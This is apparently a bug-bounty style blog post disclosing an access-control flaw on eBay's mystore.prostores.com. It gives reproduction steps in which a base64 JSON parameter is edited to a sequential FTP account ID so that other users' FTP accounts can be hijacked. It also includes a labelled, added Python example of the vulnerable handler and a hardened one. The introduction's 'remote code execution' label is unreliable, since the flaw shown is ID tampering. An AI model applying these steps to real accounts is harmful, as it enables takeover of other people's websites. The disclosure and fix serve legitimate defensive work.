
Unveiling a Logical Vulnerability on eBay mystore.prostores.com Leads to Account Compromise

Updated: Dec 2, 2023




Introduction


In the realm of cybersecurity, the hunt for vulnerabilities is an ongoing challenge, and as part of my journey as a security researcher, I unearthed a security flaw on eBay mystore.prostores.com. This vulnerability, which allows for remote code execution, poses a significant threat to the platform's integrity. In this blog post, I will share the details of this alarming discovery, the steps to reproduce it, and its potential impact.



Understanding the Logical Vulnerability


Before we delve into the specifics of this vulnerability, it's essential to understand the gravity of logical vulnerabilities. Logical vulnerabilities, also known as logical flaws, are cybersecurity weaknesses that stem from errors or inadequacies in the design, configuration, or behavior of a software system or application. Unlike traditional technical vulnerabilities that result from coding errors or software bugs, logical vulnerabilities are related to how the system processes and manages data or user interactions.


These vulnerabilities often include issues like inadequate access controls, inconsistent data validation, business logic flaws, insecure authentication mechanisms, and improper session management. Addressing logical vulnerabilities requires a deep understanding of the system's intended logic and potential misuse scenarios, making them more challenging to detect and mitigate. This type of security flaw is a serious concern in the cybersecurity landscape.



The Discovery


During a routine exploration of mystore.prostores.com, I came across a logical vulnerability that allowed me to change the passwords of FTP accounts associated with any mystore.prostores.com user. Furthermore, this flaw enabled me to compromise these FTP accounts, manipulate their settings, and gain access to, modify, or delete the data and content hosted on users' stores (websites) without their knowledge or consent.



Steps to Reproduce the Vulnerability


1. Begin by accessing the following URL while logged into any test account, such as 'testuser1':


(Note: This URL is accessible through the 'testuser2' test account, where the 'testftpuser1' FTP account was created.)


2. You will then have access to the 'testftpuser1' FTP account from your 'testuser1' account, even though that FTP account originated from 'testuser2'.


3. You can then proceed to modify the password, email, or disable the 'testftpuser1' FTP account.


4. To access other users' FTP accounts, follow these steps:


i) The data parameter value is encoded in base64, as follows:


ii) Decoding this base64 value reveals:

{
  "ftp_username": "testftpuser1",
  "system_content_flag": "1",
  "locked_flag": "0",
  "web_content_flag": "1",
  "store_ftp_account_id": "1394",
  "ftp_email": "testuser1@cyfinitilabs.com"
}

iii) To access other users' FTP accounts, the attacker clears the 'ftp_username' and 'ftp_email' values and changes the 'store_ftp_account_id' to a value such as 1394 or 1393. Because this 'store_ftp_account_id' is sequential, it can be incremented or decremented to reach other accounts (making it predictable and guessable).


iv) After this change, the decoded value looks like this:

{
  "ftp_username": "",
  "system_content_flag": "1",
  "locked_flag": "0",
  "web_content_flag": "1",
  "store_ftp_account_id": "1394",
  "ftp_email": ""
}

v) The attacker then re-encodes this crafted JSON value in base64:


vi) Next, the attacker adds this base64 value to the following URL:

vii) The attacker can then open this URL using any of their 'mystore.prostores.com' accounts. Subsequently, they can effortlessly access the victim's FTP account, modify the password and email, and even disable the account. This method allows the attacker to easily change the password of any FTP account for 'mystore.prostores.com' users, potentially compromising their FTP accounts, and enabling them to delete or modify the data and content hosted on their stores (websites).
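
The missing server-side check, shown as an added example (not code from the original post or from ProStores): the vulnerable handler trusts the 'store_ftp_account_id' inside the base64 data blob, while the hardened one verifies a MAC over the blob and then checks ownership against the session user. The owner table, the key and all function names are assumptions made for illustration.

```python
import base64, binascii, hashlib, hmac, json

# Constructed sample data: FTP account id -> owning store user (hypothetical schema).
FTP_ACCOUNT_OWNER = {1393: "testuser3", 1394: "testuser2"}
SERVER_KEY = b"constructed-demo-key"  # assumption: secret that never leaves the server


def decode_data_param(data_b64: str) -> dict:
    """Decode the base64 JSON blob carried in the data parameter."""
    try:
        obj = json.loads(base64.b64decode(data_b64, validate=True))
    except (binascii.Error, ValueError) as exc:
        raise PermissionError("malformed data parameter") from exc
    if not isinstance(obj, dict):
        raise PermissionError("malformed data parameter")
    return obj


def sign(data_b64: str) -> str:
    """Server-side MAC over the blob, so a client-edited blob is detectable."""
    return hmac.new(SERVER_KEY, data_b64.encode(), hashlib.sha256).hexdigest()


def load_ftp_account_vulnerable(session_user: str, data_b64: str) -> int:
    """Behaviour described in the post: the id in the blob is trusted as-is."""
    return int(decode_data_param(data_b64)["store_ftp_account_id"])


def load_ftp_account_hardened(session_user: str, data_b64: str, mac: str) -> int:
    """Reject edited blobs, then authorize against the session, not the blob."""
    if not hmac.compare_digest(sign(data_b64), mac):
        raise PermissionError("data parameter was modified")
    try:
        account_id = int(decode_data_param(data_b64)["store_ftp_account_id"])
    except (KeyError, TypeError, ValueError) as exc:
        raise PermissionError("malformed data parameter") from exc
    # The ownership check is the actual fix; the MAC is defence in depth.
    if FTP_ACCOUNT_OWNER.get(account_id) != session_user:
        raise PermissionError("FTP account does not belong to this user")
    return account_id
```

The ownership lookup alone closes the hole; base64 is an encoding and gives the blob no integrity protection, which is why the MAC is added on top.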




Impact


The ramifications of this vulnerability are severe. An attacker can easily change the passwords of FTP accounts belonging to mystore.prostores.com users, compromising their FTP accounts. Additionally, the attacker can change the account's password and email, disable FTP account access, and modify or delete the data and content hosted on users' stores, including websites.



Conclusion


The discovery of this logical vulnerability on mystore.prostores.com underscores the importance of continuous security research and responsible disclosure. This blog aims to shed light on the potential risks associated with such vulnerabilities and encourage platform owners to strengthen their security measures. Logical vulnerabilities pose a significant threat to user data and platform integrity, and immediate action is necessary to safeguard both users and organizations relying on these services.


